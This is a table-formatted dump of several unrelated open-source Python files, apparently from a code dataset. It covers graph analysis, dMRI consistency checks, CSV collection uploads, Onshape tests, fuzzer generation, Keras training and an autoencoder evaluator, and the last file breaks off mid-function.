id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
9668999 | # Спички*
import math
def matches(n):
# https://oeis.org/A078633
return (2 * n) + math.ceil(2 * math.sqrt(n))
if __name__ == '__main__':
n = int(input())
print(matches(n))
| StarcoderdataPython |
6487807 | import networkx as nx
import numpy as np
G = nx.read_gexf('test.gefx', relabel=True)
print(G.nodes())
# some graph G
A = nx.to_numpy_matrix(G)
print(nx.diameter(G))
print(np.max(A))
print(A.shape)
print(A.sum(axis=1)[:, np.newaxis].shape)
# A_ij is the probability that i takes the term from j
| StarcoderdataPython |
5039883 | #!/usr/bin/env python
from setuptools import setup
setup(
package_data={"": ["CardDefs.xml", "Strings/*/*.txt"]},
)
| StarcoderdataPython |
12806497 | from lib.BaseModule import BaseModule
class A(BaseModule):
is_act = False
def __init__(self):
print("init")
def fram_update(self):
print("帧频刷新")
return 0 | StarcoderdataPython |
11363006 | <gh_stars>0
# -*- coding: utf-8 -*-
import rs.sqldb as sqldb
import csv
import slughifi
import simplejson as json
import os
from os.path import join as osjoin
import shutil
import re
with open( 'trans.json', 'rb' ) as trans_file:
content = trans_file.read()
translation = json.loads( content )
def trans( key ):
if key not in translation:
print 'WARNING: key %s not in translation' % key
return translation.get( key, '???' )
def get_collection_data( post_data ):
'''Get collection data from POST and return it in a dict.'''
collection_data = {
'name' : post_data.get( 'name', '' ),
'label' : post_data.get( 'label', '' ),
'visible': post_data.get( 'vis', '' ),
'parents': []
}
if post_data.get( 'all_colls' ):
direct_parent_id = int( post_data.get( 'all_colls' ) )
else:
direct_parent_id = None
collection_data['parents'].append( direct_parent_id )
if post_data.get('type') == 'new':
i = 0
while post_data.get( 'ancestor-name-%d' % i ):
collection_data['parents'].append({
'name' : post_data.get( 'ancestor-name-%d' % i ),
'description': post_data.get( 'ancestor-desc-%d' % i ),
'label' : None
})
i += 1
return collection_data
def collection_data_validated( data ):
'''Check if collection with such a name and parent does not collide with
the other potential siblings.'''
db_tree = sqldb.get_db_tree()
parent_id = data['parents'][0]
siblings = filter( lambda e: e['parent'] == parent_id, db_tree )
name = data['name'] if len( data['parents'] ) == 1 else data['parents'][1]['name']
return name.encode('utf-8') not in [ sib['name'] for sib in siblings ]
def hierarchy_validated( hierarchy, labels ):
'''Check indexes of hierarchy fields. Checks if all indexes are smaller than
maximal possible index and if they are not repeated.
Index -1 in 'aux_index' means that it
was not chosen, 'index' field = 1 should not happend.'''
if hierarchy[0]['index'] == -1:
return False
# if user left last field empty, remove it
if len( hierarchy ) > 1 and hierarchy[-1]['index'] == -1:
del hierarchy[-1]
# count how many times indexes appear in hierarchy
counter = [ 0 for _ in labels ]
for level in hierarchy:
column_ind = level['index']
aux_ind = level['aux_index']
counter[ column_ind ] -= 1
try:
counter[ aux_ind ] -= 1
except:
# if index is beyond possible range
pass
# check if no index is repeated
bad_indexes = filter( lambda x: x < 0, counter )
return len( bad_indexes ) > 0
def save_upl_file( upl_file ):
'''Save content of upl_file in a temporary file and return its name.'''
tmp_name = 'tmp.csv'
tmp_file = open( tmp_name, 'w' )
for chunk in upl_file.chunks():
tmp_file.write( chunk )
tmp_file.close()
upl_file.seek( 0 )
return tmp_name
def get_header_labels( upl_file ):
# Get labels from the header of the uploaded file.'''
reader = csv.reader( upl_file, quotechar='"', delimiter=';' )
header = reader.next()
upl_file.seek( 0 )
utf_header = [ field.decode('utf-8') for field in header ]
return utf_header
def guess_types( file_name, hierarchy ):
'''Try to guess types in the data file, but omit hierarchy fields.
Return those types in the list.'''
upl_file = open( file_name, 'rb' )
reader = csv.reader( upl_file, quotechar='"', delimiter=';' )
reader.next()
first_line = reader.next()
types = []
# Get types for all fields.
for field in first_line:
if is_int( field ):
types.append( get_int_type_info( field ) )
elif is_float( field ):
types.append( get_float_type_info( field ) )
else:
types.append( get_string_type_info( field ) )
upl_file.close()
# Remove hierarchy fields from the types list.'''
hierarchy_indexes = get_hierarchy_indexes( hierarchy )
for i in hierarchy_indexes:
del types[i]
return types
def get_columns_descr( hierarchy, labels, types ):
'''Get non hierarchy columns description.'''
indexes = get_hierarchy_indexes( hierarchy )
labels_copy = labels[:]
# Remove labels of hierarchy columns.
for i in indexes:
del labels_copy[ i ]
columns_descr = []
for i in range( len( types ) ):
columns_descr.append({
'label' : labels_copy[ i ],
'type' : types[ i ]['type'],
'format' : types[ i ]['format']
})
return columns_descr
def get_hierarchy_indexes( hierarchy ):
'''Get from each hierarchy field indexes of hierarchy column and auxiliary
column (if it exists). Return them in reversed order.'''
indexes = []
for level in hierarchy:
col_ind = level['index']
aux_ind = level['aux_index']
if col_ind != -1:
indexes.append( col_ind )
if aux_ind != -1:
indexes.append( aux_ind )
return sorted( indexes, reverse=True )
def columns_validated( columns, hierarchy, labels ):
'''Check if all non hierarchy columns are described in columns description
and for each column check its attributes: type, basic and processable.'''
if len( columns ) + len( get_hierarchy_indexes( hierarchy ) ) != len( labels ):
return False
for col in columns:
if col['type'] not in ['string', 'number']:
return False
if (col['basic'] not in [True, False]) and (col['processable'] not in [True, False]):
return False
return True
def get_columns_errors( columns ):
errors = []
for (i, col) in enumerate( columns, 1 ):
error = []
if col['type'] not in ['string', 'number']:
error.append( '%s: %s' % (trans('py_wrong_type'), col['type']) )
if col['basic'] not in [True, False]:
error.append( '%s: %s' % (trans('py_wrong_basic'), col['basic']) )
if col['processable'] not in [True, False]:
error.append( '%s: %s' % (trans('py_wrong_proc'), col['processable ']) )
if error != []:
error_msg = ', '.join( error )
errors.append( '%s %d: %s' % (trans('py_column'), i, error_msg) )
return errors
def label_to_key( label ):
# need to cut because of POSTRGES max column name length
return slughifi.slughifi(label, True).replace('-', '_')[:63]
def get_int_type_info( value ):
return {
'type': 'number',
'format': '# ##0'
}
def get_float_type_info( value ):
return {
'type': 'number',
'format': '# ##0.00'
}
def get_string_type_info( value ):
return {
'type': 'string',
'format': '@'
}
def is_int( value ):
try:
int( value )
except ValueError:
return False
return True
def is_float( value ):
try:
parsed_value = re.sub( '\s', '', value )
float( parsed_value )
except ValueError:
return False
return True
def is_string( value ):
try:
str( value )
except ValueError:
return False
return True
def create_desc_file( coll_data, hier, cols, user, fname):
'''Create file describing collection with description of hierarchy, columns,
collection's label and name, parent collections and uploader's login.'''
# Fill key and index fields in columns.
columns = add_key( cols )
columns = add_columns_indexes( columns, hier )
# Change direct parent's index to fields describing all antecendants.
parents = id_to_path( coll_data['parents'][0] ) + coll_data['parents'][1:]
merged_desc = {
'name' : coll_data['name'],
'description': None,
'label' : coll_data['label'],
'columns' : columns,
'hierarchy' : hier,
'parents' : parents,
'user' : user
}
with open( fname, 'wb' ) as f:
f.write( json.dumps( merged_desc, sort_keys=True, indent=4, encoding='utf-8' ) )
def id_to_path( par_id ):
'''Change parent id of a node in dbtree to name, description and label
of all antecedants. Direct parent is the last element in the list.'''
if par_id is None:
return []
db_tree = sqldb.get_db_tree()
# dict: id -> name
id_dict = dict( zip([ n['id'] for n in db_tree ], db_tree) )
# move to next parents to get their info until top parent is reached
path = []
parent_id = int( par_id )
while True:
parent = id_dict[ parent_id ]
path.append({
'name': parent['name'],
'description': parent['description'],
'label': None
})
try:
parent_id = int( parent['parent'] )
except:
break
path.reverse()
return path
def add_key( columns ):
columns_copy = columns[:]
for c in columns_copy:
c['key'] = label_to_key( c['label'] )
return columns_copy
def add_labels( hierarchy, labels ):
'''Add labels to hierarchy fields. Each field gets 'label', which is label
of hierarchy column and 'aux_label' if the field has auxiliary column.'''
hierarchy_copy = hierarchy[:]
# dict: label_index -> label
labels_dict = dict( zip( range( len(labels) ), labels ) )
for level in hierarchy_copy:
level['label'] = labels_dict[ level['index'] ]
level['aux'] = level['aux_index'] != -1
if level['aux_index'] != -1:
level['aux_label'] = labels_dict[ level['aux_index'] ]
return hierarchy_copy
def add_columns_indexes( columns, hierarchy ):
'''Returns copy of columns with their indexes in data file added.'''
columns_copy = columns[:]
hierarchy_indexes = get_hierarchy_indexes( hierarchy )
both_size = len( hierarchy_indexes ) + len( columns )
columns_indexes = range( both_size )
# Leave only non hierarchy columns' indexes.
for ind in hierarchy_indexes:
del columns_indexes[ind]
for (i, ind) in enumerate(columns_indexes):
columns_copy[i]['index'] = ind
return columns_copy
def move_src_file(filename, new_name):
'''Move file with data to directory with data files.'''
new_filename = new_name + '.csv'
curr_path = os.getcwd()
new_path = osjoin( curr_path, 'site_media', 'csv', new_filename )
print 'Copy file %s to %s' % (new_filename, new_path)
shutil.move( filename, new_path )
def remove_files( files ):
'''Remove temporary files used to upload data into db.'''
for f in files:
os.remove( f )
| StarcoderdataPython |
12846633 | <gh_stars>1-10
#!/usr/bin/env python
# ===============================================================================
# dMRIharmonization (2018) pipeline is written by-
#
# <NAME>
# Brigham and Women's Hospital/Harvard Medical School
# <EMAIL>, <EMAIL>
#
# ===============================================================================
# See details at https://github.com/pnlbwh/dMRIharmonization
# Submit issues at https://github.com/pnlbwh/dMRIharmonization/issues
# View LICENSE at https://github.com/pnlbwh/dMRIharmonization/blob/master/LICENSE
# ===============================================================================
from conversion import read_bvals, read_imgs, read_imgs_masks
import numpy as np
from warnings import warn
from plumbum import local
from util import abspath, load, isfile, getpid
from findBshells import findBShells
import sys
def check_bshells(ref_imgs, ref_bvals):
unmatched=[]
for imgPath in ref_imgs:
imgPath= local.path(imgPath)
if not imgPath.exists():
FileNotFoundError(imgPath)
inPrefix = abspath(imgPath).split('.nii')[0]
bvals= findBShells(inPrefix+'.bval')
if (bvals==ref_bvals).all():
print('b-shells matched for', imgPath.name)
else:
print(f'\nUnmatched b-shells for {imgPath.name}')
print(bvals)
print(f'ref_bvals {ref_bvals}\n')
unmatched.append(imgPath._path)
print('')
if len(unmatched):
print('Unmatched cases:')
print(unmatched)
raise ValueError('Leave out the unmatched cases or change the reference case for determining b-shell to run multi-shell-dMRIharmonization')
else:
print('All cases have same b-shells. Data is good for running multi-shell-dMRIharmonization')
print('')
def check_resolution(ref_imgs, ref_res):
unmatched = []
for imgPath in ref_imgs:
imgPath= local.path(imgPath)
if not imgPath.exists():
FileNotFoundError(imgPath)
res= load(imgPath._path).header['pixdim'][1:4]
if (res-ref_res).sum()<=10e-6:
print('spatial resolution matched for', imgPath.name)
else:
print(f'\nUnmatched spatial resolution for {imgPath.name}')
print(res)
print(f'ref_res {ref_res}\n')
unmatched.append(imgPath._path)
print('')
if len(unmatched):
print('Unmatched cases:')
print(unmatched)
raise ValueError('Leave out the unmatched cases or change the reference case for determining spatial resolution to run multi-shell-dMRIharmonization')
else:
print('All cases have same spatial resolution. Data is good for running multi-shell-dMRIharmonization')
print('')
def consistencyCheck(ref_csv, outputBshellFile= None, outPutResolutionFile= None):
try:
ref_imgs, _ = read_imgs_masks(ref_csv)
except:
ref_imgs = read_imgs(ref_csv)
if isfile(outputBshellFile) and isfile(outPutResolutionFile):
ref_bvals= read_bvals(outputBshellFile)
ref_res = np.load(outPutResolutionFile)
else:
ref_bshell_img = ref_imgs[0]
print(f'Using {ref_bshell_img} to determine b-shells')
inPrefix = abspath(ref_bshell_img).split('.nii')[0]
ref_bvals = findBShells(inPrefix + '.bval', outputBshellFile)
ref_res = load(ref_bshell_img).header['pixdim'][1:4]
np.save(outPutResolutionFile, ref_res)
print('b-shells are', ref_bvals)
print('\nSite', ref_csv, '\n')
print('Checking consistency of b-shells among subjects')
check_bshells(ref_imgs, ref_bvals)
print('spatial resolution is', ref_res)
print('Checking consistency of spatial resolution among subjects')
check_resolution(ref_imgs, ref_res)
if __name__ == '__main__':
if len(sys.argv)==1 or sys.argv[1]=='-h' or sys.argv[1]=='--help':
print('''Check consistency of b-shells and spatial resolution among subjects
Usage:
consistencyCheck list.csv/txt ref_bshell_bvalues.txt ref_res_file.npy
Provide a csv/txt file with first column for dwi and 2nd column for mask: dwi1,mask1\\ndwi2,mask2\\n...
or just one column for dwi1\\ndwi2\\n...
In addition, provide ref_bshell_bvalues and ref_res_file.''')
exit()
ref_csv= abspath(sys.argv[1])
outputBshellFile= abspath(sys.argv[2])
outPutResolutionFile= abspath(sys.argv[3])
if isfile(ref_csv):
consistencyCheck(ref_csv, outputBshellFile, outPutResolutionFile)
else:
raise FileNotFoundError(f'{ref_csv} does not exists.')
| StarcoderdataPython |
3434574 | from create_project import *
from packaging import *
from plugins import *
| StarcoderdataPython |
6567667 | <filename>python/test/test_onshape_url.py<gh_stars>10-100
from __future__ import print_function
import json
import pint
import pytest
from onshape_client.assembly import AssemblyDefinition
from onshape_client.onshape_url import OnshapeElement, ConfiguredOnshapeElement
from onshape_client.units import u
ureg = pint.UnitRegistry()
def test_creation_from_urls():
assert (
OnshapeElement(
"https://cad.onshape.com/documents/c8f8013d34183b1de74fa930/w/574b77701d8b74987c273500/e/455ef770951fe37de0b8ff08?configuration=List_TOpkWtvolR0KY4%3Dewf"
).configuration
== "List_TOpkWtvolR0KY4=ewf"
)
def test_assembly_structural_equivalence(json_assets):
asm1 = AssemblyDefinition(
json.load((json_assets / "assembly_definition_three_axes").open())
)
asm2 = AssemblyDefinition(
json.load((json_assets / "assembly_definition_three_axes_copied").open())
)
assert asm1.is_structurally_equal_assembly(asm2)
@pytest.mark.parametrize("element", ["ps_configurable_cube"], indirect=True)
def test_configuration_update(element):
element = ConfiguredOnshapeElement(element.get_url())
assert element._get_default_configuration_map() == {
"size": 500 * u.inch,
"edge_configuration": "Default",
"show_cube": True,
}
element.update_current_configuration({"size": 20 * ureg.m})
assert (
element.get_url_with_configuration()
== "https://cad.onshape.com/documents/cca81d10f239db0db9481e6f/v/6ccf88eb92d55be180c06cf9/e/69c9eedda86512966b20bc90?configuration=edge_configuration%3DDefault%3Bshow_cube%3DTrue%3Bsize%3D20%2Bmeter"
)
element.update_current_configuration(
{"size": 40 * u.inch, "edge_configuration": "chamfered"}
)
assert (
element.get_url_with_configuration()
== "https://cad.onshape.com/documents/cca81d10f239db0db9481e6f/v/6ccf88eb92d55be180c06cf9/e/69c9eedda86512966b20bc90?configuration=edge_configuration%3Dchamfered%3Bshow_cube%3DTrue%3Bsize%3D40%2Binch"
)
element.update_current_configuration(
{"size": 10 * u.inch, "edge_configuration": "chamfered", "show_cube": False}
)
assert (
element.get_url_with_configuration()
== "https://cad.onshape.com/documents/cca81d10f239db0db9481e6f/v/6ccf88eb92d55be180c06cf9/e/69c9eedda86512966b20bc90?configuration=edge_configuration%3Dchamfered%3Bshow_cube%3DFalse%3Bsize%3D10%2Binch"
)
| StarcoderdataPython |
5158384 | <reponame>tjbanks/bmtk
from temporalfilter import TemporalFilterCosineBump
from transferfunction import ScalarTransferFunction
from linearfilter import SpatioTemporalFilter
import numpy as np
from spatialfilter import GaussianSpatialFilter
from cellmodel import OnUnit, OffUnit
| StarcoderdataPython |
1763675 | <reponame>ashdnazg/toppy<gh_stars>0
import numpy as np
from ..system_stat import MemoryStat
from . import common
from .animated import AnimatedAxes
class MemoryPlotter(AnimatedAxes):
def __init__(self, mem=None):
self.mem = mem or MemoryStat()
def setup(self, axes, x):
self.mem.setup()
self.y_mem = common.none_array(x.size)
self.y_swap = common.none_array(x.size)
self.line_mem = axes.plot(x, self.y_mem, label='Memory')[0]
self.line_swap = axes.plot(x, self.y_swap, label='Swap')[0]
self.lines = [self.line_mem, self.line_swap]
axes.set_title('Memory')
axes.set_ylabel('% Memory')
axes.set_xlim(x.min(), x.max())
axes.set_ylim(0, 100)
axes.tick_params('x', bottom=False, labelbottom=False)
axes.grid(True, axis='y')
axes.legend()
return self.lines
def update(self):
self.mem.update()
common.additem_cyclic_inplace(self.y_mem, self.mem.mem.used * 100 / self.mem.mem.total)
common.additem_cyclic_inplace(self.y_swap, self.mem.swap.used * 100 / self.mem.swap.total)
self.line_mem.set_ydata(self.y_mem)
self.line_swap.set_ydata(self.y_swap)
return self.lines
| StarcoderdataPython |
3450056 |
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class MapsPluginConfig(AppConfig):
default_auto_field = 'django.db.models.AutoField'
name = 'cmsplugins.maps'
verbose_name = _('Maps Plugin')
| StarcoderdataPython |
5151616 | #!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import subprocess
from xdevice import platform_logger
LOG = platform_logger("Gen")
class Gen(object):
def process_command_gen(self, options):
if (len(options.testtype) != 1) or (options.dirpath == "") or \
(options.fuzzername == ""):
LOG.error(
"GEN need para -t(testtype) -fz(fuzzername) -dp(dirpath)")
return
if "FUZZ" in options.testtype:
self.fuzz_dir_generation(options)
else:
LOG.error("GEN is not support %s." % options.testtype)
def gen_fuzzer_list_file(self, fuzzer_list):
filepath = os.path.join(sys.source_code_root_path, "test",
"developertest", "libs", "fuzzlib", "fuzzer_list.txt")
LOG.info("The fuzzer list file path: %s" % filepath)
with open(filepath, "w") as gn_file:
gn_file.truncate(0)
if fuzzer_list:
for target in fuzzer_list:
if target:
gn_file.write("\"%s\",\n" % target)
@classmethod
def fuzz_dir_generation(cls, options):
helper_path = os.path.join("..", "libs", "fuzzlib", "fuzzer_helper.py")
fuzz_path = os.path.join(sys.source_code_root_path, options.dirpath)
LOG.info("fuzz_path = %s" % fuzz_path)
if not os.path.exists(fuzz_path):
os.makedirs(fuzz_path)
LOG.info("make folder %s" % fuzz_path)
command = [sys.executable, helper_path, 'generate',
options.fuzzername, fuzz_path]
LOG.info("command %s" % command)
subprocess.call(command, shell=False) | StarcoderdataPython |
4985632 | <gh_stars>10-100
#-----------------------------------------------------------------------------------------------------------------------
# Project: resnet-finetune-demo
# Filename: train.py
# Date: 16.06.2017
# Author: <NAME> - CTA.ai
#-----------------------------------------------------------------------------------------------------------------------
"""
Performs training of a single fully-connected classifier layer on a cached set of feature vectors prepared with
build_features.py. Trained model is saved to classifier_weights.h5.
"""
import os
import numpy as np
import keras
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau
from keras.layers import Dense
from keras.models import Sequential
from keras.optimizers import SGD
TRAIN_DIR = os.path.expanduser("~/ml/data/indoor/train")
VAL_DIR = os.path.expanduser("~/ml/data/indoor/val")
FEATURES_FILENAME = "features-resnet152.npy"
LABELS_FILENAME = "labels-resnet152.npy"
WEIGHTS_CLASSIFIER = "classifier_weights.h5"
# Load train data
train_features = np.load(os.path.join(TRAIN_DIR, FEATURES_FILENAME))
train_labels = np.load(os.path.join(TRAIN_DIR, LABELS_FILENAME))
train_labels = keras.utils.np_utils.to_categorical(train_labels)
# Load val data
val_features = np.load(os.path.join(VAL_DIR, FEATURES_FILENAME))
val_labels = np.load(os.path.join(VAL_DIR, LABELS_FILENAME))
val_labels = keras.utils.np_utils.to_categorical(val_labels)
# Build softmax model
classifier_model = Sequential()
classifier_model.add(Dense(67, activation='softmax',
kernel_initializer='TruncatedNormal',
bias_initializer='zeros',
input_shape=train_features.shape[1:]))
# Define optimizer and compile
opt = SGD(lr=0.1)
classifier_model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
# Prepare callbacks
lr_decay = ReduceLROnPlateau(factor=0.9, patience=1, verbose=1)
checkpointer = ModelCheckpoint(filepath=WEIGHTS_CLASSIFIER, save_best_only=True, verbose=1)
# Train
classifier_model.fit(train_features, train_labels,
epochs=50,
batch_size=256,
validation_data=(val_features, val_labels),
callbacks=[lr_decay, checkpointer])
| StarcoderdataPython |
9274 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from os import path as op
from ..util import load_data_file
# This is the package data dir, not the dir for config, etc.
DATA_DIR = op.join(op.dirname(__file__), '_data')
def load_iris():
"""Load the iris dataset
Returns
-------
iris : NpzFile
data['data'] : a (150, 4) NumPy array with the iris' features
data['group'] : a (150,) NumPy array with the iris' group
"""
return np.load(load_data_file('iris/iris.npz',
force_download='2014-09-04'))
def load_crate():
"""Load an image of a crate
Returns
-------
crate : array
256x256x3 crate image.
"""
return np.load(load_data_file('orig/crate.npz'))['crate']
def pack_unit(value):
"""Packs float values between [0,1] into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
pack = np.zeros(value.shape + (4,), dtype=np.ubyte)
for i in range(4):
value, pack[..., i] = np.modf(value * 256.)
return pack
def pack_ieee(value):
"""Packs float ieee binary representation into 4 unsigned int8
Returns
-------
pack: array
packed interpolation kernel
"""
return np.fromstring(value.tobytes(),
np.ubyte).reshape((value.shape + (4,)))
def load_spatial_filters(packed=True):
"""Load spatial-filters kernel
Parameters
----------
packed : bool
Whether or not the data should be in "packed" representation
for use in GLSL code.
Returns
-------
kernel : array
16x1024x4 (packed float in rgba) or
16x1024 (unpacked float)
16 interpolation kernel with length 1024 each.
names : tuple of strings
Respective interpolation names, plus "Nearest" which does
not require a filter but can still be used
"""
names = ("Bilinear", "Hanning", "Hamming", "Hermite",
"Kaiser", "Quadric", "Bicubic", "CatRom",
"Mitchell", "Spline16", "Spline36", "Gaussian",
"Bessel", "Sinc", "Lanczos", "Blackman", "Nearest")
kernel = np.load(op.join(DATA_DIR, 'spatial-filters.npy'))
if packed:
# convert the kernel to a packed representation
kernel = pack_unit(kernel)
return kernel, names
| StarcoderdataPython |
3555707 | <gh_stars>0
# -*- coding: utf-8 -*-
import sys
import codecs
import json
import numpy as np
import random
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
def softmax(x):
e = np.exp(x - np.max(x)) # prevent overflow
if e.ndim == 1:
return e / np.sum(e, axis=0)
else:
return e / np.array([np.sum(e, axis=1)]).T # ndim = 2
class BinaryFeatureList(object):
def __init__(self, lang_struct):
for k,v in lang_struct.iteritems():
setattr(self, k, v)
self.binvect = np.array(self.binvect, dtype=np.int32)
class CategoricalFeatureList(object):
def __init__(self, mv_catvect, evaluator, has_missing_values=True, fid_freq=None):
self.evaluator = evaluator
self.orig = mv_catvect
self.catvect = np.copy(self.orig)
self.mv_list = []
self.has_missing_values = has_missing_values
if self.has_missing_values:
# randomly initialize missing values
for fid, v in enumerate(self.orig):
if v < 0: # missing value
self.mv_list.append(fid)
if fid_freq:
v = rand_partition(fid_freq[fid])
else:
size = self.evaluator.map_cat2bin[fid,1]
v = np.random.randint(0, size)
self.catvect[fid] = v
self.binvect = self.evaluator.cat2bin(self.catvect)
def propose_mv_constrained(self, fid=-1):
catvect2 = np.copy(self.catvect)
binvect2 = np.copy(self.binvect)
if fid < 0:
fid = np.random.random_integers(0, high=len(self.mv_list) - 1) # inclusive
old_v = catvect2[fid]
bidx, size = self.evaluator.map_cat2bin[fid]
new_v = np.random.random_integers(0, high=size - 2)
if new_v >= old_v:
new_v += 1
catvect2[fid] = new_v
binvect2[bidx + old_v] = 0
binvect2[bidx + new_v] = 1
return (binvect2, catvect2)
class BaseEvaluator(object):
def __init__(self, binsize, dims=50, eta=0.01, _lambda=0.001, penalty=None):
self.binsize = binsize
self.dims = dims
self.weight_list = [("We", "gWe"), ("be", "gbe"), ("Wd", "gWd"), ("bd", "gbd"), ("Ws", "gWs")]
# init_e = 0.01 / self.binsize
init_e = 4 * np.sqrt(6.0 / (self.binsize + self.dims)) # per DeepLearning tutorial
self.We = np.random.uniform(-init_e, init_e, (self.dims, self.binsize)) # encode
self.be = np.random.uniform(-init_e, init_e, self.dims)
# self.Wd = np.random.uniform(-init_e, init_e, (self.binsize, self.dims)) # decode
self.Wd = self.We.T # tied weight
self.bd = np.random.uniform(-init_e, init_e, self.binsize)
self.Ws = np.random.uniform(-init_e, init_e, self.dims) # evaluation
self.gWe = 1e-45 * np.ones((self.dims, self.binsize))
self.gbe = 1e-45 * np.ones(self.dims)
self.gWd = 1e-45 * np.ones((self.binsize, self.dims))
self.gbd = 1e-45 * np.ones(self.binsize)
self.gWs = 1e-45 * np.ones(self.dims)
# SGD-related params
self.penalty = penalty
self.scale = 1.0
self.eta = eta
self.eta_start = eta
self._lambda = _lambda # L2 regularization term
self.time = 1
def update_weight(self, delta):
cdiff = 0.0
# update weights using AdaGrad
for _type, _gtype in self.weight_list:
if _type not in delta:
continue
diff = self.scale * delta[_type]
if np.fabs(diff).sum() < 1E-100: # fail-safe
continue
W = getattr(self, _type)
G = getattr(self, _gtype)
G += diff * diff
S = np.sqrt(G)
if self.penalty is None or self._lambda <= 0.0:
# without regularization
udiff = self.eta * diff / S
W += udiff
cdiff += np.fabs(udiff).sum()
elif self.penalty == 'l2':
# L2 regularization
denom = self.eta * self._lambda + S
uterm = self.eta * (diff / denom)
W *= (S / denom)
W += uterm
# ignore the shrinkage term
cdiff += np.fabs(uterm).sum()
# sys.stderr.write("%f\n" % (np.fabs(self.eta * diff / np.sqrt(G)).sum() - np.fabs(uterm).sum()))
else:
# L1 regularization
g = diff / S
a = W + self.eta * g
W2 = np.sign(a) * np.maximum(np.fabs(a) - self._lambda * g, 0.0)
setattr(self, _type, W2)
cdiff += self.eta * np.fabs(g).sum() # approximate
self.time += 1
# if self.time % 100 == 0:
# # self.scale /= 1.0 + self._lambda # self._lambda * self.eta
# # self.eta /= 1.0 + (10.0 / self.time)
# if self.eta < self.eta_start * 0.0001:
# self.eta = self.eta_start * 0.0001
return cdiff
def encode(self, binvect):
# sigmoid
return sigmoid(self.scale * (np.dot(self.We, binvect) + self.be))
# # tanh
# return np.tanh(self.scale * (np.dot(self.We, binvect) + self.be))
# # linear
# return self.scale * (np.dot(self.We, binvect) + self.be)
def decode(self, hvect):
# sigmoid
return sigmoid(self.scale * (np.dot(self.Wd, hvect) + self.bd))
# # tanh
# return np.tanh(self.scale * (np.dot(self.Wd, hvect) + self.bd))
# # linear
# return self.scale * (np.dot(self.Wd, hvect) + self.bd)
def calc_score(self, hvect):
return self.scale * np.dot(self.Ws, hvect)
def calc_delta_autoencoder(self, binvect, delta=None, count=1.0):
if delta is None:
delta = {
"We": np.zeros((self.dims, self.binsize)),
"be": np.zeros(self.dims),
}
if "Wd" not in delta:
delta["Wd"] = np.zeros((self.binsize, self.dims))
delta["bd"] = np.zeros(self.binsize)
hvect = self.encode(binvect)
binvect2 = self.decode(hvect)
# TODO: softmax (1-of-K constraints)-based error
# cross-entropy (sigmoid)
error2 = binvect - binvect2
delta["Wd"] += count * np.outer(error2, hvect)
delta["bd"] += count * error2
error3 = self.scale * np.dot(self.Wd.T, error2)
error4 = error3 * (hvect * (1.0 - hvect)) # sigmoid
# error4 = error3 * (1.0 - hvect * hvect) # tanh
# error4 = error3 # linear
delta["We"] += count * np.outer(error4, binvect)
delta["be"] += count * error4
return (delta, np.dot(error2, error2) / 2)
def calc_delta_scorer(self, binvect, hvect, delta=None, count=1.0):
if delta is None:
delta = {
"We": np.zeros((self.dims, self.binsize)),
"be": np.zeros(self.dims),
}
if "Ws" not in delta:
delta["Ws"] = np.zeros(self.dims)
delta["Ws"] += count * hvect
error = self.scale * self.Ws * (hvect * (1.0 - hvect)) # sigmoid
# error = self.scale * self.Ws * (1.0 - hvect * hvect) # tanh
# error = self.scale * self.Ws # linear
delta["We"] += count * np.outer(error, binvect)
delta["be"] += count * error
return delta
def _calc_partition_function(self, burn_in=100, interval=10, samples=100, initial=None):
# # we ommit the N term because it causes underflow
# if self.logZ is not None and np.random.uniform(0.0, 1.0) > 0.01:
# return self.logZ
if initial is None:
current = np.random.random_integers(0, 1, size=self.binsize)
else:
current = initial
current_hvect = self.encode(current)
current_score = self.calc_score(current_hvect)
score_vect = np.empty(samples)
for _iter in xrange(burn_in):
current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
score_vect[0] = current_score
for _iter1 in xrange(samples - 1):
for _iter2 in xrange(0, interval):
current, current_hvect, current_score, is_accepted = self._sample_unconstrained(current, current_hvect, current_score)
score_vect[_iter1 + 1] = current_score
m = np.max(score_vect)
self.logZ = np.log(np.exp(score_vect - m).sum()) + m - np.log(samples)
return self.logZ
def _sample_unconstrained(self, current, current_hvect, current_score):
proposed = self._propose_unconstrained(current)
proposed_hvect = self.encode(proposed)
proposed_score = self.calc_score(proposed_hvect)
e = np.exp([current_score, proposed_score] - np.max([current_score, proposed_score]))
if e[0] < np.random.uniform(0.0, e.sum()):
# accepted
return (proposed, proposed_hvect, proposed_score, True)
else:
return (current, current_hvect, current_score, False)
def _propose_unconstrained(self, binvect, do_copy=True):
if do_copy:
binvect = np.copy(binvect)
fid = np.random.random_integers(0, high=self.binsize-1)
binvect[fid] = 1 if binvect[fid] == 0 else 0
return binvect
class NestedEvaluator(object):
def init_nested(self, binsize, dims=50, dims2=10):
# super(NestedEvaluator, self).__init__(binsize, dims=dims, eta=eta, _lambda=_lambda, penalty=penalty)
self.dims2 = dims2
self.weight_list.append(("Wh", "gWh"))
self.weight_list.append(("bh", "gbh"))
init_e = 4 * np.sqrt(6.0 / (self.binsize + self.dims)) # per DeepLearning tutorial
self.Ws = np.random.uniform(-init_e, init_e, self.dims2)
self.Wh = np.random.uniform(-init_e, init_e, (self.dims2, self.dims))
self.bh = np.random.uniform(-init_e, init_e, self.dims2)
self.gWs = 1e-45 * np.ones(self.dims2)
self.gWh = 1e-45 * np.ones((self.dims2, self.dims))
self.gbh = 1e-45 * np.ones(self.dims2)
def calc_score(self, hvect):
return self.scale * np.dot(self.Ws, sigmoid(self.scale * (np.dot(self.Wh, hvect) + self.bh)))
def calc_delta_scorer(self, binvect, hvect, delta=None, count=1.0):
if delta is None:
delta = {
"We": np.zeros((self.dims, self.binsize)),
